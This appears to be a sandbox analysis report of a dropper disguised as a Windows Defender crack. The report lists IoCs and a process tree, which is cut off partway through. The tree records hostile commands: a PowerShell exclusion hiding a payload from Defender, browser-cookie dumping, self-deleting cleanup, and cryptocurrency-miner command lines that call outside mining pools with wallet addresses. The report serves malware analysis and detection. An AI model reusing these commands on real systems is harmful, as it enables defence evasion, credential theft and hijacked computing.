0a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
9500	PING.EXE
4468	PING.EXE
3644	PING.EXE
4240	PING.EXE
4320	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	287	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	569	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	755	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	130	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	282	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	750	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	752	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	754	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	588	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	597	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	603	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
964	setups.tmp
964	setups.tmp

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	Setup.exe
Token: SeCreateTokenPrivilege	3636	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	3636	askinstall20.exe
Token: SeLockMemoryPrivilege	3636	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	3636	askinstall20.exe
Token: SeMachineAccountPrivilege	3636	askinstall20.exe
Token: SeTcbPrivilege	3636	askinstall20.exe
Token: SeSecurityPrivilege	3636	askinstall20.exe
Token: SeTakeOwnershipPrivilege	3636	askinstall20.exe
Token: SeLoadDriverPrivilege	3636	askinstall20.exe
Token: SeSystemProfilePrivilege	3636	askinstall20.exe
Token: SeSystemtimePrivilege	3636	askinstall20.exe
Token: SeProfSingleProcessPrivilege	3636	askinstall20.exe
Token: SeIncBasePriorityPrivilege	3636	askinstall20.exe
Token: SeCreatePagefilePrivilege	3636	askinstall20.exe
Token: SeCreatePermanentPrivilege	3636	askinstall20.exe
Token: SeBackupPrivilege	3636	askinstall20.exe
Token: SeRestorePrivilege	3636	askinstall20.exe
Token: SeShutdownPrivilege	3636	askinstall20.exe
Token: SeDebugPrivilege	3636	askinstall20.exe
Token: SeAuditPrivilege	3636	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	3636	askinstall20.exe
Token: SeChangeNotifyPrivilege	3636	askinstall20.exe
Token: SeRemoteShutdownPrivilege	3636	askinstall20.exe
Token: SeUndockPrivilege	3636	askinstall20.exe
Token: SeSyncAgentPrivilege	3636	askinstall20.exe
Token: SeEnableDelegationPrivilege	3636	askinstall20.exe
Token: SeManageVolumePrivilege	3636	askinstall20.exe
Token: SeImpersonatePrivilege	3636	askinstall20.exe
Token: SeCreateGlobalPrivilege	3636	askinstall20.exe
Token: 31	3636	askinstall20.exe
Token: 32	3636	askinstall20.exe
Token: 33	3636	askinstall20.exe
Token: 34	3636	askinstall20.exe
Token: 35	3636	askinstall20.exe
Token: SeDebugPrivilege	1340	multitimer.exe
Token: SeDebugPrivilege	4212	taskkill.exe
Token: SeDebugPrivilege	972	MicrosoftEdge.exe
Token: SeDebugPrivilege	972	MicrosoftEdge.exe
Token: SeDebugPrivilege	972	MicrosoftEdge.exe
Token: SeDebugPrivilege	972	MicrosoftEdge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2068	setups.exe
964	setups.tmp
972	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1180 wrote to memory of 544	1180	Microsoft_Windows_Defender_crack.exe	79
PID 1180 wrote to memory of 544	1180	Microsoft_Windows_Defender_crack.exe	79
PID 1180 wrote to memory of 544	1180	Microsoft_Windows_Defender_crack.exe	79
PID 544 wrote to memory of 2752	544	cmd.exe	82
PID 544 wrote to memory of 2752	544	cmd.exe	82
PID 544 wrote to memory of 2752	544	cmd.exe	82
PID 544 wrote to memory of 980	544	cmd.exe	83
PID 544 wrote to memory of 980	544	cmd.exe	83
PID 544 wrote to memory of 980	544	cmd.exe	83
PID 544 wrote to memory of 832	544	cmd.exe	84
PID 544 wrote to memory of 832	544	cmd.exe	84
PID 544 wrote to memory of 832	544	cmd.exe	84
PID 544 wrote to memory of 1552	544	cmd.exe	85
PID 544 wrote to memory of 1552	544	cmd.exe	85
PID 544 wrote to memory of 1552	544	cmd.exe	85
PID 2752 wrote to memory of 2480	2752	keygen-pr.exe	86
PID 2752 wrote to memory of 2480	2752	keygen-pr.exe	86
PID 2752 wrote to memory of 2480	2752	keygen-pr.exe	86
PID 1552 wrote to memory of 2500	1552	keygen-step-4.exe	87
PID 1552 wrote to memory of 2500	1552	keygen-step-4.exe	87
PID 832 wrote to memory of 388	832	keygen-step-3.exe	88
PID 832 wrote to memory of 388	832	keygen-step-3.exe	88
PID 832 wrote to memory of 388	832	keygen-step-3.exe	88
PID 2480 wrote to memory of 4044	2480	key.exe	89
PID 2480 wrote to memory of 4044	2480	key.exe	89
PID 2480 wrote to memory of 4044	2480	key.exe	89
PID 388 wrote to memory of 3644	388	cmd.exe	91
PID 388 wrote to memory of 3644	388	cmd.exe	91
PID 388 wrote to memory of 3644	388	cmd.exe	91
PID 2500 wrote to memory of 1340	2500	Setup.exe	92
PID 2500 wrote to memory of 1340	2500	Setup.exe	92
PID 2500 wrote to memory of 2068	2500	Setup.exe	93
PID 2500 wrote to memory of 2068	2500	Setup.exe	93
PID 2500 wrote to memory of 2068	2500	Setup.exe	93
PID 1552 wrote to memory of 3636	1552	keygen-step-4.exe	94
PID 1552 wrote to memory of 3636	1552	keygen-step-4.exe	94
PID 1552 wrote to memory of 3636	1552	keygen-step-4.exe	94
PID 2068 wrote to memory of 964	2068	setups.exe	95
PID 2068 wrote to memory of 964	2068	setups.exe	95
PID 2068 wrote to memory of 964	2068	setups.exe	95
PID 3636 wrote to memory of 3428	3636	askinstall20.exe	97
PID 3636 wrote to memory of 3428	3636	askinstall20.exe	97
PID 3636 wrote to memory of 3428	3636	askinstall20.exe	97
PID 3428 wrote to memory of 4212	3428	cmd.exe	101
PID 3428 wrote to memory of 4212	3428	cmd.exe	101
PID 3428 wrote to memory of 4212	3428	cmd.exe	101

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
10096	attrib.exe
8704	attrib.exe
10688	attrib.exe
11228	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:4044
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:980
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:832
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:388
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3644
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2500
    - - C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
      - C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 1 3.1617432422.60680f665e729 101
        6⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 2 3.1617432422.60680f665e729
        7⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\is-K47ED.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-K47ED.tmp\Setup3310.tmp" /SL5="$302CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\is-A90SF.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-A90SF.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5216
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4340
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 948
        12⤵
        Program crash
        
        PID:11048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1004
        12⤵
        Program crash
        
        PID:11100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1080
        12⤵
        Program crash
        
        PID:5452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1056
        12⤵
        Program crash
        
        PID:10836
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:5920
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\is-88L7N.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-88L7N.tmp\LabPicV3.tmp" /SL5="$2030E,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\is-A3D8T.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-A3D8T.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:5672
        
        C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe
        
        "C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe" /VERYSILENT
        14⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\is-BMD54.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BMD54.tmp\prolab.tmp" /SL5="$402D2,575243,216576,C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe" /VERYSILENT
        15⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\bc-197f1-c21-9b1a3-0bdd2afcc2156\Kokikujowy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bc-197f1-c21-9b1a3-0bdd2afcc2156\Kokikujowy.exe"
        14⤵
        
        PID:5052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exe & exit
        15⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exe
        16⤵
        
        PID:6400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exe & exit
        15⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exe
        16⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:7348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe & exit
        15⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe
        16⤵
        
        PID:6252
        
        C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe
        17⤵
        
        PID:4792
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exe & exit
        15⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exe
        16⤵
        
        PID:8136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cgnhhen.gj4\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7184
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exe /8-2222 & exit
        15⤵
        
        PID:7336
        
        C:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exe /8-2222
        16⤵
        
        PID:7680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exe & exit
        15⤵
        
        PID:7740
        
        C:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exe
        16⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 1 3.1617432579.60681003dde86 101
        19⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 2 3.1617432579.60681003dde86
        20⤵
        
        PID:8884
        
        C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:8232
        
        C:\Users\Admin\AppData\Local\Temp\is-D4HHA.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D4HHA.tmp\vict.tmp" /SL5="$304EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\is-10TCM.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-10TCM.tmp\win1host.exe" 535
        23⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:9116
        
        C:\Users\Admin\AppData\Local\Temp\is-KVGS0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KVGS0.tmp\Setup3310.tmp" /SL5="$704EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\is-TJQF3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TJQF3.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Local\Temp\owuvwzrkveq\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\owuvwzrkveq\app.exe" /8-23
        21⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe" /ustwo INSTALL
        21⤵
        
        PID:7552
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "4jcsiz3mdb0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe" & exit
        22⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "4jcsiz3mdb0.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\01fxtcsav2z\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\01fxtcsav2z\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:9148
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:9824
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:9604
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe" /SpecialRun 4101d8 6656
        24⤵
        
        PID:5656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:8464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:548
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:10580
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:11092
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 1584
        23⤵
        Program crash
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe" /silent /subid=482
        21⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\is-FGCF5.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FGCF5.tmp\vpn.tmp" /SL5="$1080C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe" /silent /subid=482
        22⤵
        
        PID:8540
        
        C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe" ll
        18⤵
        
        PID:7968
        
        C:\Users\Admin\AppData\Local\Temp\is-1SD1R.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1SD1R.tmp\setups.tmp" /SL5="$2062A,635399,250368,C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe" ll
        19⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:7020
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:8692
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:9000
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:9096
        
        C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"
        18⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"
        19⤵
        
        PID:792
        
        C:\Users\Admin\AppData\Roaming\D5D6.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D5D6.tmp.exe"
        18⤵
        
        PID:1768
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:8648
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:10004
        
        C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe"
        18⤵
        
        PID:7200
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe
        19⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:3892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:9296
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:8680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exe & exit
        15⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exe
        16⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 1 3.1617432581.60681005179e7 104
        18⤵
        
        PID:8580
        
        C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 2 3.1617432581.60681005179e7
        19⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\5paasmiurye\cpyrix.exe
        
